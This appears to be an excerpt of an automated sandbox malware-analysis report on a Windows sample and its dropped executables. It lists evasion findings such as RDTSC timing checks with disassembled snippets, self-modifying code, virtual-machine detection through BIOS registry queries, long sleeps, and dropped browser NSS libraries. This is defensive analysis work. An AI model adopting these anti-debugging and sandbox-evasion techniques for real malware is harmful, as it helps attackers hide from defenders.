Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1128EED second address: 1128EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1128F51 second address: 1128F5E instructions: 0x00000000 rdtsc 0x00000002 je 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1129045 second address: 112904F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F40B515FBF6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1129111 second address: 112919A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F40B477E799h 0x0000000e nop 0x0000000f jmp 00007F40B477E793h 0x00000014 push 00000000h 0x00000016 mov di, E869h 0x0000001a push FDA12128h 0x0000001f jmp 00007F40B477E78Fh 0x00000024 add dword ptr [esp], 025EDF58h 0x0000002b mov dword ptr [ebp+122D2B60h], ebx 0x00000031 push 00000003h 0x00000033 mov ecx, 73011411h 0x00000038 mov si, 9F92h 0x0000003c push 00000000h 0x0000003e jnc 00007F40B477E78Bh 0x00000044 mov edi, 0D22FDEDh 0x00000049 push 00000003h 0x0000004b mov edx, esi 0x0000004d push CD1BDBBCh 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 jo 00007F40B477E786h 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 112919A second address: 112919F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 112919F second address: 11291D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E790h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 0D1BDBBCh 0x00000010 sub edx, 6A2CE8A5h 0x00000016 lea ebx, dword ptr [ebp+1244DCCFh] 0x0000001c add edi, dword ptr [ebp+122D2BC2h] 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 jg 00007F40B477E788h 0x0000002b push edi 0x0000002c pop edi 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1148938 second address: 114893E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114893E second address: 1148976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E795h 0x00000009 popad 0x0000000a popad 0x0000000b push ecx 0x0000000c pushad 0x0000000d jmp 00007F40B477E799h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1146A41 second address: 1146A4F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1146A4F second address: 1146A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007F40B477E786h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1146E49 second address: 1146E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1146E51 second address: 1146E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1146E57 second address: 1146E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1146F97 second address: 1146FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F40B477E786h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1146FA1 second address: 1146FB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jbe 00007F40B515FBF6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11472AE second address: 11472B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11472B5 second address: 11472C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jl 00007F40B515FBF6h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11476B6 second address: 11476BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11476BA second address: 11476C2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11476C2 second address: 11476C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11476C8 second address: 11476CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11476CC second address: 11476D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1147831 second address: 114783D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F40B515FBFEh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114783D second address: 114784D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F40B477E78Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114784D second address: 1147853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1147853 second address: 114785F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F40B477E786h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114785F second address: 114787F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC01h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jc 00007F40B515FBF6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 113FE5E second address: 113FE62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11484F3 second address: 11484FD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F40B515FBF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1148747 second address: 114874D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114874D second address: 1148751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1148751 second address: 1148755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1148755 second address: 1148774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B515FC06h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1148774 second address: 1148787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E78Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1148787 second address: 11487C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F40B515FC08h 0x0000000f jmp 00007F40B515FC07h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11487C0 second address: 11487CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F40B477E786h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114BB4D second address: 114BB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114BB5C second address: 114BB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114BB60 second address: 114BB86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F40B515FC03h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114BB86 second address: 114BB9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jg 00007F40B477E786h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114BB9C second address: 114BBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114BBA1 second address: 114BBA6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114CD3D second address: 114CD41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1116C08 second address: 1116C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F40B477E786h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 3DEB9C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 57E679 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 57E30B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5A760E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 6086E0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Special instruction interceptor: First address: FAEA86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Special instruction interceptor: First address: FAC59E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Special instruction interceptor: First address: 1172BF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Special instruction interceptor: First address: 11D36CA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 4FEA86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 4FC59E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 6C2BF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 7236CA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Special instruction interceptor: First address: A81CC9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Special instruction interceptor: First address: A81C2F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Special instruction interceptor: First address: C20BC0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Special instruction interceptor: First address: C1FB1A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Special instruction interceptor: First address: A7F1EE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Special instruction interceptor: First address: CAB5EF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Special instruction interceptor: First address: 19DF01 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Special instruction interceptor: First address: 34ADD3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Special instruction interceptor: First address: 376624 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Special instruction interceptor: First address: 1A3335 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Special instruction interceptor: First address: 9FEB9C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Special instruction interceptor: First address: B9E679 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Special instruction interceptor: First address: B9E30B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Special instruction interceptor: First address: BC760E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Special instruction interceptor: First address: C286E0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Special instruction interceptor: First address: E01CC9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Special instruction interceptor: First address: E01C2F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Special instruction interceptor: First address: FA0BC0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Special instruction interceptor: First address: F9FB1A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Special instruction interceptor: First address: DFF1EE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Special instruction interceptor: First address: 102B5EF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Special instruction interceptor: First address: E9EA86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Special instruction interceptor: First address: E9C59E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Special instruction interceptor: First address: 1062BF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Special instruction interceptor: First address: 10C36CA instructions caused by: Self-modifying code

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Memory allocated: 5040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Memory allocated: 52C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Memory allocated: 51E0000 memory reserve \| memory write watch	Jump to behavior

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe

Code function: 4_2_050400EB rdtsc

4_2_050400EB

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 7614			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 892			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\file.exe TID: 7532	Thread sleep time: -50025s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7520	Thread sleep count: 78 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7520	Thread sleep time: -156078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7508	Thread sleep count: 71 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7508	Thread sleep time: -142071s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7616	Thread sleep time: -270000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7512	Thread sleep count: 79 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7512	Thread sleep time: -158079s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7504	Thread sleep count: 73 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7504	Thread sleep time: -146073s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe TID: 7172	Thread sleep time: -36018s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe TID: 3320	Thread sleep time: -42021s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe TID: 1596	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe TID: 3844	Thread sleep time: -46023s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe TID: 2256	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4456	Thread sleep count: 69 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4456	Thread sleep time: -138069s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3688	Thread sleep count: 68 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3688	Thread sleep time: -136068s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5776	Thread sleep count: 92 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5776	Thread sleep time: -184092s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5300	Thread sleep count: 7614 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5300	Thread sleep time: -15235614s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1196	Thread sleep count: 188 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1196	Thread sleep time: -5640000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3428	Thread sleep count: 85 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3428	Thread sleep time: -170085s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4476	Thread sleep count: 78 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4476	Thread sleep time: -156078s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5772	Thread sleep count: 88 > 30	Jump to behavior
